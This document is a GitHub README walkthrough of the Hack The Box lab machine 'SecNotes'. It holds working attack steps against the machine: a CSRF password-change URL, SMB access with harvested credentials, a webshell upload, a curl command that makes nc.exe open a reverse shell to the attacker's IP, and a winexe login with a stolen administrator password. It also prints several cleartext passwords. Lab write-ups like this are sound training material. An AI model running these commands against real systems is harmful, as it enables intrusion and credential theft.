Skip to content

Latest commit

 

History

History
155 lines (75 loc) · 2.93 KB

README.md

File metadata and controls

155 lines (75 loc) · 2.93 KB
Raw

SecNotes

nmap -p- -sT --min-rate 10000 10.10.10.97 -Pn

Alt text

After knowing open ports(80,445,8808), let's do greater nmap scan.

nmap -A -sC -sV -p80,445,8808 10.10.10.97 -Pn

Alt text

I see login and register page of application on port (80).

Alt text

Let's register and login.

dr4ks: dr4ks1

Alt text

I enumerate web application and can't find anything, but one thing is that I can do CSRF (Cross-Site Request Forgery) attack on page of 'Contact'.

Let's try this.

Alt text

Alt text

I see that while sending request to 'tyler' user, it automatically clicks.

If I send malicious link (password change) to him, I can know his password.

Let's enumerate password change function.

Alt text

Now, I will put this malicious password change into Contact section and tyler clicks this and I can see his password.

http://10.10.10.97/change_pass.php?password=password&confirm_password=password&submit=submit
http://10.10.16.8/attackedworkeddr4ks

Alt text

Alt text

Yes attack worked.

Let's login to 'tyler' account via 'password'.

Alt text

Hola, we find his cleartext credentials(calls for new site).

Alt text

tyler / 92g!mA8BGjOirkL%OG*&

I try to access SMB share via this credentials and it worked.

smbmap -H 10.10.10.97 -u tyler -p '92g!mA8BGjOirkL%OG*&'

Alt text

We have 'WRITE' privilege for 'new-site' share, if we upload something to here, we can see from HTTP server which locating on port '8808'

Let's try this.

Alt text

Alt text

Let's add our webshell to execute commands.

Alt text

Alt text

Let's add 'nc.exe' file into this machine to get reverse shell.

Alt text

Now, browse the page and add reverse shell command.

curl "http://10.10.10.97:8808/cmd.php?cmd=nc.exe+-e+cmd.exe+10.10.16.8+1337"

Alt text

user.txt

Alt text

Alt text

I find credentials here.

secnotes: q8N#9Eos%JinE57tke72

root: qwer1234QWER!@#$

Now, I enumerate more and find 'bash.lnk' file on 'tyler' Desktop.

Alt text

I just switched into powershell.

While I just run bash.exe on Powershell, it gives me 'root' user on Linux machine.

Alt text

As you see from image , I see 'Administrator' credentials on .bash_history file.

administrator%u6!4ZwgwOM#^OBf#Nwnh

I just use winexe tool to access into machine via 'Admin' privileges.

winexe -U '.\administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe

Alt text

root.txt

Alt text